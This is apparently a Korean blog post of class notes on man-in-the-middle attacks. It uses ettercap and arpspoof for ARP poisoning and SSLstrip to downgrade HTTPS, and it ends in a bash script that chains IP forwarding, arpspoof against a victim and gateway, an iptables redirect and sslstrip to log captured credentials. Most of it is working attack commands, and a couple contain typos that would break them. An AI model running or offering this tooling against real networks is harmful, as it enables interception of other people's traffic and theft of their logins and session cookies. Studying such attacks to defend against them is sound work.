ettercap -G
target1
-> host -> 상대 윈도우
target2
-> ssh접속 서버 -> 상대 리눅스
arp table을 꼭 확인하고 공격을 하도록 -> arp spoofing이 잘 되어 있는지 확인
-> arp redirect 공격이 들어온건 아닌가 확인
-> ettercap 내에 host scanning 확인
-> arp spoofing 수동실행하여 arp spoofing
one-way poison 을 할 경우 잘 적용이 안됨
putty에서 SSH 2 / 2 only로 할 것인가
--------
http -> tcp + http -> 암호화 안 됨
https -> tcp + ssl + http -> 암호화 -> 허나 깨졌음
443 https
https를 강제로 http로 쓰게 만들어 스니핑
-> 구글 크롬에서는 공격이 안먹힘
https를 요청할때 중간에서 spoofing 하여 다시 대상에게
http로 접속하라고 reply
서버에게도 https reply를 되 돌려줘 버림 -> 대상에게 https를 전송하지만 -> http로 된다 ???
cookie
대량의 세션 유지
쿠키의 유효기간
쿠키 가로채기
SSLstrip
파이썬 2.4
구글, 페이스북에도 무선상태에도 됨
스마트폰에도 됨
echo 1 > /proc/sys/net/ipv4/ip_forward // fragrouter 의 역할을 함
-> 값을 1로 덮어써서 forwarding 가능하게 함 -> vim으로는 수정 불가
arpspoof -i interface -t 정상사용자 IP GWIP
대상 통신 대체 포트 설정
iptables -t nat -A PREROUTEING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
포워딩 -> fragrouter
python sslstrip.py -w [SSL 연결정보 저장할 파일명] -ㅣ [포트]
[절대경로]
tail -f secret223 -> 실시간으로 확인
------
리눅스에서 ftp 사용
apt-get install filezilla
없으면 ...
ftp 61.76....
stu2...
비번
cd /p/network/ssl
get 파일명
------------
나만의 툴 만들기
#!/bin/bash
echo target ip input:
read target_ip
echo gw ip input:
read gw_ip
echo target ip : $target_ip
echo g w ip: $gw_ip
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t $target_ip $gw_ip &
iptables -t nat -A PREROUTEING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
python sslstrip.py -w ./keylog -ㅣ 10000
---------
종료 시키기
killall -9 arpoof python
-----------
**
교육용 소스일뿐 악용시 전적으로 본인의 책임임
**
'Network' 카테고리의 다른 글
many types of dos attacks (0) | 2014.09.30 |
---|---|
sidejacking and hping3 (0) | 2014.09.29 |
spoofing, sniffing and redirection (0) | 2014.09.25 |
spoofing (0) | 2014.09.24 |
spoofing (0) | 2014.09.23 |